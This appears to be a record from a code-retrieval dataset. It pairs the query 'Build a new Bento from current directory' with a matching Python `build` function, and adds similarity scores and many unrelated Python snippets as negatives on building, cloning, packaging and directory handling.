"async def addtags(self, ctx, tag, *, data):\r\n\t\tTag = self.settings.ServerConfig(ctx.guild.id, 'Tags')\r\n\t\tif not tag in Tag:\r\n\t\t\tTag[tag] = self.Conf.Tags\r\n\t\t\tawait ctx.send('Added Tag: {}'.format(tag))\r\n\t\telse:\r\n\t\t\tawait ctx.send('Edited Tag: '.format(tag))\r\n\r\n\t\tnowgmt = time.strftime(\"%H:%M:%S, %d/%m/%Y\", time.gmtime())\r\n\t\t\r\n\t\tTag[tag]['user'] = ctx.author.id\r\n\t\tTag[tag]['data'] = data\r\n\t\tTag[tag]['time'] = nowgmt\r\n\t\tself.settings.ServerConfig(ctx.guild.id, 'Tags', Tag)",
"def push(self, x: int) -> None:\n self.data.push(x)",
"def docker_push(c):\n cli_tasks.docker_push.run(c)",
"def command_insert(self, a_command):\n \n # Use the command to send a GCM.\n gcm = GCM(API_KEY)\n response = gcm.json_request(registration_ids=REGISTRATION_IDS, data={'data': a_command})\n a_command.gcm_response = response\n \n a_command.put()\n return a_command"
] | [
"0.71998096",
"0.6480765",
"0.5861547",
"0.5851244",
"0.5771112",
"0.575511",
"0.5752704",
"0.57498515",
"0.568986",
"0.564071",
"0.56019354",
"0.5566268",
"0.5532686",
"0.5483675",
"0.54428613",
"0.542945",
"0.5403216",
"0.5375344",
"0.5329458",
"0.53241456",
"0.53143793",
"0.53034",
"0.5295266",
"0.52948445",
"0.5287468",
"0.5282802",
"0.52817434",
"0.52816194",
"0.52518886",
"0.52261347",
"0.52087975",
"0.5185521",
"0.51756185",
"0.51755214",
"0.51596874",
"0.5136779",
"0.51322365",
"0.51246077",
"0.51015234",
"0.510047",
"0.5097144",
"0.5095989",
"0.5088798",
"0.507358",
"0.50619745",
"0.50619745",
"0.50573355",
"0.5052031",
"0.5050427",
"0.5048329",
"0.5034402",
"0.5029425",
"0.5026796",
"0.50165635",
"0.50165635",
"0.5008754",
"0.5005434",
"0.49923885",
"0.49895847",
"0.4986887",
"0.49835807",
"0.49797964",
"0.49784303",
"0.49671394",
"0.49593547",
"0.49526995",
"0.49510062",
"0.4948335",
"0.49474564",
"0.49453437",
"0.4944745",
"0.49333584",
"0.4926325",
"0.4926219",
"0.49210805",
"0.49105445",
"0.49051163",
"0.48965386",
"0.4893434",
"0.4886455",
"0.4874453",
"0.4873474",
"0.4871798",
"0.48649544",
"0.48563847",
"0.48506352",
"0.4844202",
"0.48288995",
"0.48200965",
"0.48153389",
"0.4814049",
"0.48122308",
"0.48090312",
"0.4800188",
"0.47984445",
"0.4792178",
"0.47912428",
"0.4791215",
"0.47905847",
"0.4789722"
] | 0.70428616 | 1 |
Build a new Bento from current directory. | def build(build_ctx: str, bentofile: str, version: str) -> None: # type: ignore (not accessed)
if sys.path[0] != build_ctx:
sys.path.insert(0, build_ctx)
build_bentofile(bentofile, build_ctx=build_ctx, version=version) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def build(root):",
"def build():",
"def makeProject(self, version, baseDirectory=None):\n if baseDirectory is None:\n baseDirectory = FilePath(self.mktemp())\n baseDirectory.createDirectory()\n segments = version.package.split('.')\n directory = baseDirectory\n for segment in segments:\n directory = directory.child(segment)\n if not directory.exists():\n directory.createDirectory()\n directory.child('__init__.py').setContent('')\n directory.child('topfiles').createDirectory()\n directory.child('topfiles').child('README').setContent(version.base())\n replaceProjectVersion(\n directory.child('_version.py').path, version)\n return Project(directory)",
"def _create_checkout(self):\n parent_git_dir = os.path.join(self._parent_repo, self._run_git_command(\n ['rev-parse', '--git-dir']).strip())\n self._workdir = tempfile.mkdtemp(prefix='drover_%s_' % self._branch)\n logging.debug('Creating checkout in %s', self._workdir)\n git_dir = os.path.join(self._workdir, '.git')\n git_common.make_workdir_common(parent_git_dir, git_dir, self.FILES_TO_LINK,\n self.FILES_TO_COPY, mk_symlink)\n self._run_git_command(['config', 'core.sparsecheckout', 'true'])\n with open(os.path.join(git_dir, 'info', 'sparse-checkout'), 'w') as f:\n f.write('/codereview.settings')\n\n branch_name = os.path.split(self._workdir)[-1]\n self._run_git_command(['checkout', '-b', branch_name, self._branch_ref])\n self._branch_name = branch_name",
"def makeProject(self, version, baseDirectory=None):\n if baseDirectory is None:\n baseDirectory = FilePath(self.mktemp())\n segments = version[0].split(\".\")\n directory = baseDirectory\n for segment in segments:\n directory = directory.child(segment)\n if not directory.exists():\n directory.createDirectory()\n directory.child(\"__init__.py\").setContent(b\"\")\n directory.child(\"newsfragments\").createDirectory()\n directory.child(\"_version.py\").setContent(genVersion(*version).encode())\n return Project(directory)",
"def __init__(self, root_dir, relpath, must_exist=True):\r\n\r\n path = os.path.abspath(os.path.join(root_dir, relpath))\r\n buildfile = os.path.join(path, BuildFile._CANONICAL_NAME) if os.path.isdir(path) else path\r\n\r\n if os.path.isdir(buildfile):\r\n raise IOError(\"%s is a directory\" % buildfile)\r\n\r\n if must_exist:\r\n if not os.path.exists(buildfile):\r\n raise IOError(\"BUILD file does not exist at: %s\" % buildfile)\r\n\r\n if not BuildFile._is_buildfile_name(os.path.basename(buildfile)):\r\n raise IOError(\"%s is not a BUILD file\" % buildfile)\r\n\r\n if not os.path.exists(buildfile):\r\n raise IOError(\"BUILD file does not exist at: %s\" % buildfile)\r\n\r\n self.root_dir = os.path.realpath(root_dir)\r\n self.full_path = os.path.realpath(buildfile)\r\n\r\n self.name = os.path.basename(self.full_path)\r\n self.parent_path = os.path.dirname(self.full_path)\r\n\r\n self._bytecode_path = os.path.join(self.parent_path, '.%s.%s.pyc' % (\r\n self.name, PythonIdentity.get()))\r\n\r\n self.relpath = os.path.relpath(self.full_path, self.root_dir)\r\n self.canonical_relpath = os.path.join(os.path.dirname(self.relpath), BuildFile._CANONICAL_NAME)",
"def bundle(self):\n\n try:\n self.build_directory.mkdir(parents=True)\n except FileExistsError:\n logger.warning('Directory already exists: %s', self.build_directory)\n decision = input(\n f'{self.build_directory} already exists. Overwrite? Y/[N]: '\n )\n if decision.strip().upper() == 'Y':\n logger.info('Deleting old build directory: %s', self.build_directory)\n shutil.rmtree(self.build_directory)\n self.build_directory.mkdir(parents=True)\n else:\n return\n\n with cd(self.app_directory):\n self._install_dependencies()\n self._handle_supplemental_data()\n self._cleanup_files()\n if self.make_zip:\n self._zip_files()",
"def temp(cls, basedir=None):\r\n context = cls(BuildFile(get_buildroot(), basedir or 'BUILD.temp', must_exist=False))\r\n with cls.activate(context):\r\n yield",
"def build(config):",
"def build(_):",
"def create(self):\n if os.path.isdir(self.repodir):\n if os.listdir(self.repodir):\n raise EmtError('%s is not empty' % self.repodir)\n else:\n os.makedirs(self.repodir)\n self.git_cmd('init')\n self.initialized = True",
"def build(target_dir):\n prepare_demo_site(target_dir)\n\n patch_config(\n target_dir, (\"# CREATE_FULL_ARCHIVES = False\", \"CREATE_FULL_ARCHIVES = True\")\n )\n\n with cd(target_dir):\n __main__.main([\"build\"])",
"def move_files_into_build():\n build_root = os.path.join(template_path, 'build')\n create_python_package(build_root)\n\n build_buildbot = os.path.join(template_path, 'build', 'buildbot')\n create_python_package(build_buildbot)\n\n pythonify('runtests', [], ['build']) \n pythonify('master.cfg', ['buildbot'], ['build', 'buildbot'])",
"def build(working_directory=None, args=None):\n from .buildme import main\n if args is None:\n args = []\n return main(working_directory, args)",
"def Build(self, out_file):\n raise NotImplementedError",
"def clone(self):\n out, err, code = self.command( [\"git\", \"clone\", self.repo] )\n\n # find the directory into which the\n self.directory = self.path\n for path in os.listdir(self.path):\n self.directory = os.path.join(self.path,path)\n break",
"def build_for_dir(cls, dir_path):\n return cls(etau.parse_dir_pattern(dir_path)[0])",
"def build_code(self):\n if not path.isfile(path.join(self.tmpdir, 'requirements.txt')):\n return\n\n oldpwd = os.getcwd()\n os.chdir(self.tmpdir)\n\n call('pip install --requirement requirements.txt --target .'.split(' '))\n\n # We need to create a __init__.py per code directory without it.\n # This is required to not create a PYTHONPATH with all directories.\n #\n for (current_dir, directories, files) in os.walk('.', topdown=False):\n if current_dir.endswith('.dist-info'):\n # This is a python metadirectory, we can skip it\n continue\n namespacer = path.join(current_dir, '__init__.py')\n if not path.isfile(namespacer):\n print(\"Creating file {0}\".format(namespacer))\n with open(namespacer, 'w') as nmf:\n nmf.write('# File Generated by lambdamanager packager')\n\n os.chdir(oldpwd)",
"def build(self, conanfile):\n app = ConanApp(self._conan_api.cache_folder)\n conanfile.folders.set_base_package(conanfile.folders.base_build)\n conanfile.folders.set_base_pkg_metadata(os.path.join(conanfile.build_folder, \"metadata\"))\n run_build_method(conanfile, app.hook_manager)",
"def _create_builder(self, tmp_dir):\n return cifuzz.InternalGithubBuilder(self.PROJECT_NAME,\n self.PROJECT_REPO_NAME, tmp_dir,\n self.SANITIZER, self.COMMIT_SHA,\n self.PR_REF)",
"def build(path=None, output=None):\n conf.load(path)\n cache = Cache()\n if cache.processing_errors():\n for file_name, error in cache.processing_errors():\n message = \"error processing source file '%s' - %s\"\n logger.error(message % (file_name, error))\n if output:\n conf.set('build_path', output)\n logger.info('build directory: ' + conf.get('build_path'))\n for builder in builders.order():\n builder(cache)",
"def make(source, dependentOn, builder, buildNew=False, *builderParams):\n # check if pickle file exists\n if not os.path.exists(source):\n buildNew = True\n # check date\n # if source is newer\n if not buildNew and os.path.getmtime(source) > os.path.getmtime(dependentOn):\n print(\"load source: \", os.path.basename(source), \"...\", end=' ')\n target = load(open(source, 'rb'))\n else:\n print(\"build source: \", os.path.basename(source), \"...\", end=' ')\n target = builder(*builderParams)\n # pickle the target\n dump(target, open(source, 'wb'), 1)\n print(\"Done!\")\n return target",
"def fork(args):\n subprocess.check_call([\"git\", \"config\", \"--global\",\n \"--add\", \"safe.directory\", args.src])\n head = subprocess.check_output([\"git\", \"rev-parse\", args.rev], cwd=args.src).strip()\n obj_dir = subprocess.check_output([\"git\", \"rev-parse\", \"--git-path\", \"objects\"],\n cwd=args.src)\n obj_dir = os.path.join(args.src, obj_dir.decode())\n\n # Create an empty git repository. Native clone is too slow because the\n # typical gerrit source repo has a huge number of refs and git has to\n # inspect all of them. This approach lets us ignore all of that to only\n # use the rev we were asked to build.\n os.mkdir(\"/build/%s\" %(args.project))\n os.chdir(\"/build/%s\" %(args.project))\n subprocess.check_call([\"git\", \"init\", \"-q\"])\n\n # Setup alternates so we can see all the objects in the source repo\n with open(\".git/objects/info/alternates\", \"w\") as F:\n F.write(obj_dir)\n F.write(\"\\n\")\n\n # Create a branch using the only remote HEAD we care about\n subprocess.check_call([\"git\", \"checkout\", \"-q\", \"-b\", \"build\", \"--no-progress\", head])\n subprocess.check_call([\"git\", \"--no-pager\", \"log\", \"--oneline\", \"-n1\"])\n\n if args.project == \"kernel\":\n copy(\"%s/.config\" %(args.src), \"/build/%s\" %(args.project))\n\n args.src = \"/build/%s\" %(args.project)\n args.rev = head",
"def clone():\n require('PROJECT_NAME')\n require('PROJECT_REPO')\n require('MERCURIAL_BIN')\n\n # Create the \"apps\" directory if it does not exist.\n run('mkdir -p {}'.format(utils.home('apps')))\n\n if files.exists(utils.home('apps', env.PROJECT_NAME)):\n delete()\n\n with cd(utils.home('apps')):\n run('{0} clone {1} {2}'.format(env.MERCURIAL_BIN,\n env.PROJECT_REPO,\n env.PROJECT_NAME))",
"def pushd(cls, new_dir):\n previous_dir = os.getcwd()\n try:\n new_ab_dir = None\n if os.path.isabs(new_dir):\n new_ab_dir = new_dir\n else:\n new_ab_dir = os.path.join(previous_dir, new_dir)\n # Use absolute path to show it on FileNotFoundError message.\n cls.cd(new_ab_dir)\n yield\n finally:\n cls.cd(previous_dir)",
"def _do_action_bento_setup(self):\n self._exit_if_bento_still_running()\n\n cmd = \"rm -rf {bento_dir}; tar -zxvf {bento_tar}\".format(\n bento_dir=self.bento_home,\n bento_tar=self.bento_tgz)\n print(run(cmd))\n\n for command_suffix in [\"-env.sh\", \"\"]:\n\n kiji_env = os.path.join(self.bento_home, \"bin\", \"kiji\" + command_suffix)\n bento_env = os.path.join(self.bento_home, \"bin\", \"bento\" + command_suffix)\n if not os.path.isfile(kiji_env):\n assert os.path.isfile(bento_env)\n cmd = 'cp {bento_env} {kiji_env}'.format(\n bento_env=bento_env,\n kiji_env=kiji_env)\n run(cmd)\n\n cmd = \"cd {bento_dir}; source bin/kiji-env.sh; bento start\".format(\n bento_dir=self.bento_home,\n )\n print(run(cmd))\n assert os.path.isdir(self.bento_home)",
"def init_structure(self):\n dest = os.path.join(self.cwd, 'build', 'debian')\n self.mkdir_p(dest)\n struct = os.path.join(dest, self.cwd)\n self.mkdir_p(struct)\n# copytree_src = os.path.join(self.cwd, 'DEBIAN')\n# self.copytree(copytree_src, dest, symlinks=False, ignore=None)\n\n new_dest = os.path.join(dest, self.cwd[1:])\n self.copytree(\n self.cwd,\n new_dest,\n symlinks=False,\n ignore=self.ignore\n )",
"def build(self):\n self.puts(colored.blue(\"Building project...\"))\n\n if os.path.exists(self.build_path):\n shutil.rmtree(self.build_path)\n os.makedirs(self.build_path)\n\n with indent(2):\n self._reset_build_sequence_id()\n self._build_pre_project_template()\n self._build_project_template()\n self._build_pre_resources_template()\n self._build_resources_template()\n self._build_post_resources_template()",
"def build(self) -> None:",
"def build(session: nox.Session) -> None:\n\n dist_dir = DIR.joinpath(\"dist\")\n if dist_dir.exists():\n shutil.rmtree(dist_dir)\n\n session.install(\".[dev]\")\n session.run(\"flit\", \"build\")",
"def build_in_dir(self, build_dir: str):\n # Only build this task if it hasn't already been built\n if True: # not os.path.exists(FRONTEND_BUILD_DIR):\n self.rebuild_core()\n\n # Copy the built core and the given task file to the target path\n bundle_js_file = os.path.join(self.FRONTEND_BUILD_DIR, \"bundle.js\")\n target_resource_dir = os.path.join(build_dir, \"static\")\n target_path = os.path.join(target_resource_dir, \"bundle.js\")\n shutil.copy2(bundle_js_file, target_path)\n\n copied_static_file = os.path.join(\n self.FRONTEND_SOURCE_DIR, \"src\", \"static\", \"index.html\"\n )\n target_path = os.path.join(target_resource_dir, \"index.html\")\n shutil.copy2(copied_static_file, target_path)\n\n # Write a built file confirmation\n with open(os.path.join(build_dir, self.BUILT_FILE), \"w+\") as built_file:\n built_file.write(self.BUILT_MESSAGE)",
"def make_instance(target):\n if os.sep in target:\n raise IOError('%s not allowed in target' % os.sep)\n\n # these will OSError if the dirs exist\n os.mkdir(target)\n os.mkdir(os.path.join(target, 'assets'))\n\n shutil.copyfile(STUB_HTML, os.path.join(target, 'index.html'))",
"def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)",
"def butterfly(self):\n\n self.log.info(\"Begin Butterfly\")\n\n dst = os.path.join(self.cfg['start_dir'], 'Butterfly', 'src')\n try:\n os.chdir(dst)\n except OSError, err:\n self.log.error(\"Butterfly: failed to change to dst dir %s\" % (dst, err))\n\n cmd = \"ant\"\n run_cmd(cmd)\n\n self.log.info(\"End Butterfly\")",
"def build(c, path=\"../..\", name=\"testapp\"):\n if not os.name in [\"nt\", \"posix\"]:\n print(\"Sorry. this only supports Posix (e.g. Linux, OSX) and Windows OS. \")\n sys.exit()\n\n path=os.path.normpath(path)\n print(\"Building : -n {} -p {} \".format(name, path))\n if os.path.exists(os.path.join(path, name)):\n print(\"sorry, path {} exists\".format(os.path.abspath(os.path.join(path, name))))\n r=input(\" .. type y or yes, to go ahead deleting the existing: {} ? : \".format(os.path.join(path,name)))\n if r in [\"y\", \"yes\"]:\n import shutil\n r=shutil.rmtree(os.path.join(path,name))\n print(40*\"-\")\n print(\" ..... deleted dir tree: {}\".format(os.path.join(path, name)))\n print(40*\"-\")\n build_all(c,name, path)\n else:\n print(40*\"-\")\n print(\" ok, exiting...\")\n print(40*\"-\")\n sys.exit()\n else:\n # start the build and check\n build_all(c,name, path)",
"def new(self, object_id, base_id=None):\n with tempfile.TemporaryDirectory(dir=self.store) as tmp:\n # the tree that is yielded will be added to the content store\n # on success as object_id\n\n tree = f\"{tmp}/tree\"\n link = f\"{tmp}/link\"\n os.mkdir(tree, mode=0o755)\n\n if base_id:\n # the base, the working tree and the output tree are all on\n # the same fs, so attempt a lightweight copy if the fs\n # supports it\n subprocess.run([\"cp\", \"--reflink=auto\", \"-a\", f\"{self.refs}/{base_id}/.\", tree], check=True)\n\n yield tree\n\n # if the yield raises an exception, the working tree is cleaned\n # up by tempfile, otherwise, we save it in the correct place:\n fd = os.open(tree, os.O_DIRECTORY)\n try:\n m = hashlib.sha256()\n treesum.treesum(m, fd)\n treesum_hash = m.hexdigest()\n finally:\n os.close(fd)\n # the tree is stored in the objects directory using its content\n # hash as its name, ideally a given object_id (i.e., given config)\n # will always produce the same content hash, but that is not\n # guaranteed\n output_tree = f\"{self.objects}/{treesum_hash}\"\n\n # if a tree with the same treesum already exist, use that\n with suppress_oserror(errno.ENOTEMPTY):\n os.rename(tree, output_tree)\n\n # symlink the object_id (config hash) in the refs directory to the\n # treesum (content hash) in the objects directory. If a symlink by\n # that name alreday exists, atomically replace it, but leave the\n # backing object in place (it may be in use).\n os.symlink(f\"../objects/{treesum_hash}\", link)\n os.replace(link, f\"{self.refs}/{object_id}\")",
"def create(\n location: str,\n outputdir: pathlib.Path,\n *,\n extrabindings: Sequence[Binding],\n interactive: bool,\n revision: Optional[str],\n directory: Optional[pathlib.Path],\n in_place: bool,\n) -> None:\n config = ProjectConfig(location, (), revision, directory)\n\n with createproject(\n config, userbindings=extrabindings, interactive=interactive\n ) as project:\n projectdir = outputdir if in_place else outputdir / project.name\n repository = ProjectRepository.create(projectdir, message=\"Initial commit\")\n commit = commitproject(repository, project, commitmessage=createcommitmessage)\n\n repository.import_(commit)",
"def build(ctx):\n ctx.run(\"vsce package\", replace_env=False)",
"def _walk_dir(self, rootpath):\n assert os.path.isabs(rootpath)\n assert rootpath not in self._dirs\n relpath = self._get_rel_path(rootpath)\n self._dirs[relpath] = Directory(rootpath, relpath, None)\n for dirpath, dirnames, filenames in os.walk(rootpath):\n if 'refdata' in dirnames:\n dirnames.remove('refdata')\n currentdir = self._dirs[self._get_rel_path(dirpath)]\n # Loop through a copy so that we can modify dirnames.\n for dirname in list(dirnames):\n fullpath = os.path.join(dirpath, dirname)\n if fullpath == self._build_root:\n dirnames.remove(dirname)\n continue\n relpath = self._get_rel_path(fullpath)\n self._dirs[relpath] = Directory(fullpath, relpath, currentdir)\n extensions = ('.h', '.cuh', '.hpp', '.c', '.cc', '.cpp', '.cu', '.bm')\n for filename in filenames:\n basename, extension = os.path.splitext(filename)\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = File(fullpath, relpath, currentdir)\n elif extension == '.cmakein':\n extension = os.path.splitext(basename)[1]\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n sourcefile = GeneratorSourceFile(fullpath, relpath, currentdir)\n self._files[relpath] = sourcefile\n fullpath = os.path.join(dirpath, basename)\n relpath = self._get_rel_path(fullpath)\n fullpath = os.path.join(self._build_root, relpath)\n generatedfile = GeneratedFile(fullpath, relpath, currentdir)\n self._files[relpath] = generatedfile\n generatedfile.set_generator_source(sourcefile)\n elif extension in ('.l', '.y', '.pre'):\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = GeneratorSourceFile(fullpath, relpath, currentdir)",
"def build(c):",
"def build(self):\n pass",
"def build(self):\n pass",
"def pack():\n clean_local()\n build()\n copy_json()\n optimize()\n tarball()",
"def build_in_dir(self, build_dir: str):\n target_resource_dir = os.path.join(build_dir, \"static\")\n\n # If any additional task files are required via a source_dir, copy those as well\n extra_dir_path = self.args.blueprint.get(\"extra_source_dir\", None)\n if extra_dir_path is not None:\n extra_dir_path = os.path.expanduser(extra_dir_path)\n copy_tree(extra_dir_path, target_resource_dir)\n\n # Copy the built core and the given task file to the target path\n use_bundle = os.path.expanduser(self.args.blueprint.task_source)\n target_path = os.path.join(target_resource_dir, \"bundle.js\")\n\n should_link_task_source = self.args.blueprint.get(\"link_task_source\", False)\n if should_link_task_source:\n os.symlink(use_bundle, target_path)\n else:\n shutil.copy2(use_bundle, target_path)\n\n # Write a built file confirmation\n with open(os.path.join(build_dir, self.BUILT_FILE), \"w+\") as built_file:\n built_file.write(self.BUILT_MESSAGE)",
"def makeRepository(self, root):\n _gitInit(root)\n return root",
"def bowtie_build_cmd(fasta,ebwt_basename):\n build_index_cmd = Command(\"bowtie-build\",\n \"-f\",fasta,\n ebwt_basename)\n return build_index_cmd",
"def clone(args):\n osf = _setup_osf(args)\n project = osf.project(args.project)\n output_dir = args.project\n if args.output is not None:\n output_dir = args.output\n\n with tqdm(unit='files') as pbar:\n for store in project.storages:\n prefix = os.path.join(output_dir, store.name)\n\n for file_ in store.files:\n path = file_.path\n if path.startswith('/'):\n path = path[1:]\n\n path = os.path.join(prefix, path)\n if os.path.exists(path) and args.update:\n if checksum(path) == file_.hashes.get('md5'):\n continue\n directory, _ = os.path.split(path)\n makedirs(directory, exist_ok=True)\n\n with open(path, \"wb\") as f:\n file_.write_to(f)\n\n pbar.update()",
"def build(self):\n if os.path.exists(self.build_path) and not os.path.isdir(self.build_path):\n self._logger.error('Output path must be a folder if it already exists')\n return\n Compiler._mkdir(self.build_path)\n self._execute_backend_on_spec()",
"def make(config):\n # Create child folders\n for func in (create_basic_structure,\n copy_resources,\n copy_databases,\n copy_libraries,\n copy_security,\n copy_app_actions,\n copy_pages,\n create_application_info_file,\n replace_all_guids):\n\n INFO(\"\")\n INFO(\"+\"*70)\n INFO(\"\")\n func(config)",
"def ComponentVSDirProjectBuilder(target, source, env):\n source = source # Silence gpylint\n\n target_name = env['PROJECT_NAME']\n project_file = target[0].path\n project_dir = target[0].dir\n\n # Convert source folders to absolute paths\n folders = []\n for f in env['COMPONENT_VS_SOURCE_FOLDERS']:\n # (folder name, folder abspath, dict of contents)\n folders.append((f[0], env.Dir(f[1]).abspath, {}))\n\n # Recursively scan source directories\n print ' Scanning directories for source...'\n all_srcs = set()\n FindSources(env, all_srcs, env['PROJECT_SOURCES'],\n suffixes=env.SubstList2('$COMPONENT_VS_SOURCE_SUFFIXES'))\n\n # Walk all sources and build directory trees\n print ' Building source tree...'\n for n in all_srcs:\n # Map addRepository'd source to its real location.\n path = n.rfile().abspath\n for f in folders:\n if path.startswith(f[1]):\n if f[0] is None:\n # Folder name of None is a filter\n break\n relpath = path[len(f[1]) + 1:].split(os.sep)\n folder_dict = f[2]\n # Recursively add subdirs\n for pathseg in relpath[:-1]:\n if pathseg not in folder_dict:\n folder_dict[pathseg] = {}\n folder_dict = folder_dict[pathseg]\n # Add file to last subdir. No dict, since this isn't a subdir\n folder_dict[env.RelativePath(project_dir, path)] = None\n break\n\n print ' Writing project file...'\n\n vsp = VSProjectWriter(project_file)\n vsp.Create(target_name)\n\n # One configuration for all build modes\n vsp.AddConfig('all', {}, {})\n\n # Add files\n for f in folders:\n if f[0] is None:\n continue # Skip filters\n vsp.AddFiles(f[0], f[2])\n\n vsp.Write()\n return 0",
"def _build(self):",
"def _build(self):",
"def do_stage(self, mirror_only=False):\n super().do_stage(mirror_only)\n stsrc = self.stage.source_path\n srcpath = os.path.join( stsrc, self.build_directory )\n ppath = ancestor (srcpath)\n shutil.move(stsrc, stsrc+\"_old\")\n mkdirp(ppath)\n shutil.move(stsrc+\"_old\",srcpath)",
"def svn_fs_make_dir(*args):\r\n return _fs.svn_fs_make_dir(*args)",
"def build(working_directory, configuration):\n\n # Copy README.rst to docs/temp/README.html\n # Doxygen may not create the output folder, ensure it exists.\n\n temp_dir = os.path.join(working_directory, \"temp\")\n create_folder_if_needed(temp_dir)\n\n # Needed for dot generated docs\n create_folder_if_needed(os.path.join(temp_dir, \"images\"))\n\n # Process all the .dot files\n for item in os.listdir(working_directory):\n\n # Process the .dot files\n if _DOT_MATCH.match(item):\n # Call dot to create the files\n run_command(\n (\"dot\", \"-Tpng\", item, \"-otemp{0}images{0}{1}.png\".format(\n os.sep, item[:-4])),\n working_dir=working_directory)\n\n\n # Get the input and output file names\n source = os.path.join(os.path.dirname(working_directory), \"README.rst\")\n dest = os.path.join(temp_dir, \"README.html\")\n\n # Was the file already created and newer than the source?\n if is_source_newer(source, dest):\n\n # Load pandoc if needed to do the conversion\n pypandoc.ensure_pandoc_installed(delete_installer=True)\n pypandoc.convert_file(source, to=\"html\", outputfile=dest)\n return 0",
"def build(args):\n\n logging.info(\"Parsing configuration...\")\n try:\n config = {\"site\": configurator.get_config(os.path.join(args.src, args.configfile))}\n except Exception as exc:\n sys.exit(\"Error during configuration: \" + str(exc))\n\n if (args.autobaseurl):\n config[\"site\"][\"baseurl\"] = os.path.abspath(args.dest)\n\n logging.info(\"Loading and pre-processing content...\")\n if (os.path.isdir(os.path.join(args.src, paths.POSTS_PATH))):\n try:\n config[\"posts\"] = loader.get_from_folder(os.path.join(args.src, paths.POSTS_PATH), config)\n except ValueError as exc:\n sys.exit(\"Error loading posts: \" + str(exc))\n else:\n config[\"posts\"] = {}\n\n if (os.path.isdir(os.path.join(args.src, paths.PAGES_PATH))):\n try:\n config[\"pages\"] = loader.get_from_folder(os.path.join(args.src, paths.PAGES_PATH), config)\n except ValueError as exc:\n sys.exit(\"Error loading pages: \" + str(exc))\n else:\n config[\"pages\"] = {}\n\n logging.debug(\"Configuring Jinja2 environment...\")\n jinjaEnv = configurator.configure_jinja(config[\"site\"][\"theme\"], args.src)\n\n logging.debug(\"Initializing builder...\")\n Builder(jinjaEnv, config, args.src, args.dest, args.noclean).build()",
"def build(ctx: typer.Context):\n from .tasks import build, main\n\n sys.argv = sys.argv[:1] + (ctx.args or [\"list\"])\n main(vars(build))",
"def cli(ctx, repo_home):\n # Create a repo object and remember it as as the context object.\n ctx.obj = Repo(os.path.abspath(repo_home))",
"def test_new(tmpdir):\n chdir(tmpdir)\n subprocess.run(['leanproject', 'new'])\n assert (tmpdir/'leanpkg.path').exists()\n assert (tmpdir/'_target'/'deps'/'mathlib'/'src'/'algebra'/'free.olean').exists()",
"def chain_new(ctx, chain_name):\n project = ctx.obj['PROJECT']\n new_local_chain(project.project_dir, chain_name)",
"def lemon_bidscoin_prepare(src_path):\n lemon_prepare()\n this_dir = os.path.dirname(__file__)\n data_dir = os.path.join(this_dir,'..','_data')\n root_path = os.path.abspath(os.path.join(data_dir,'lemon'))\n bidscoin_input_path = src_path\n\n os.makedirs(bidscoin_input_path,exist_ok=True)\n\n files = _get_files(root_path)\n files = [x for x in files if x.split('.')[-1] in ['eeg','vmrk','vhdr'] ]\n\n files_out = []\n for f in files:\n session = 'ses-001'\n task = 'resting'\n head,tail=os.path.split(f)\n sub = tail.split('.')[0]\n new_path = os.path.join(bidscoin_input_path,sub,session,task,tail)\n files_out.append(new_path)\n\n for old,new in zip(files,files_out):\n print(old,' to ',new)\n os.makedirs(os.path.split(new)[0], exist_ok=True)\n if not os.path.isfile(new):\n shutil.copy2(old,new)\n else:\n print('already done, skipping...')\n print('finish')",
"def init_package(self):\n # create the package directory\n if os.path.exists(self.path):\n msg = 'path \"{}\" already existed, init aborted'.format(self.path)\n logger.error(msg)\n raise SystemExit(BASE_ESTRING + msg)\n os.makedirs(self.path)\n\n # create the src sub directory\n os.makedirs(os.path.join(self.path, 'src'))\n\n # get git config user.name\n default_author = self.git.spawn_with(\n lambda x: x.arg('config').arg('user.name')).strip()\n\n # create the Enzi.toml\n enzi_toml = os.path.join(self.path, 'Enzi.toml')\n f = io.FileIO(enzi_toml, 'w')\n writer = io.BufferedWriter(f)\n sio = EnziConfigValidator.base_file(self.name, default_author)\n file_content = sio.getvalue()\n writer.write(file_content.encode('utf-8'))\n writer.close()",
"def build():\n local('wintersmith build')",
"def _do_build ():\n if os.path.exists(\"./database\"):\n data_path = \"./database/\"\n elif os.path.exists(\"../database\"):\n data_path = \"../database/\"\n elif os.path.exists(\"../../database\"):\n data_path = \"../../database/\"\n else:\n data_path = \".\"\n\n dir_specs = {}\n databases = []\n\n # first pass over the databases to create complete tree:\n for dirpath, dirnames, filenames in os.walk(data_path):\n # all databases are stored\n for name in filenames:\n if name.endswith(\".db\"):\n databases.append(os.path.join(dirpath, name).replace(data_path, \"\"))\n # but we need to store specs here otherwise things could get a bit confusing\n elif name.endswith(\".spec\"):\n possible_dir = os.path.join(dirpath, name[:-5]+\".db\")\n if os.path.exists(possible_dir) and os.path.isdir(possible_dir):\n spec_name = possible_dir.replace(data_path, \"\")\n dir_specs[spec_name] = parse_spec(os.path.join(dirpath, name))\n\n # and we create DatabaseFolders for each subfolder\n for name in dirnames:\n if name.endswith(\".db\"):\n # dump the extension here too\n obj_name = name[:-3]\n this_folder = DatabaseFolder(obj_name)\n\n if dir_specs.has_key(name):\n this_folder.spec = dir_specs.pop(name)\n\n if dirpath != data_path:\n search = dirpath.replace(data_path, \"\").split(PATH_DELIM)\n try:\n top_folder = globals()[search[0]]\n except KeyError:\n raise DatabaseError, \"Subdirectory of a db folder without a DatabaseFolder?\"\n for p in search[1:]:\n if p == name:\n break\n try:\n top_folder = getattr(top_folder, p)\n except AttributeError:\n raise DatabaseError, \"Subdirectory of a db subfolder without a DatabaseFolder subfolder!\"\n top_folder.append(this_folder)\n else:\n globals()[obj_name] = this_folder\n\n for database in databases:\n build_from_file_name(database, data_path)",
"def import_bento_(bento_path: str) -> None: # type: ignore (not accessed)\n bento = import_bento(bento_path)\n logger.info(\"%s imported.\", bento)",
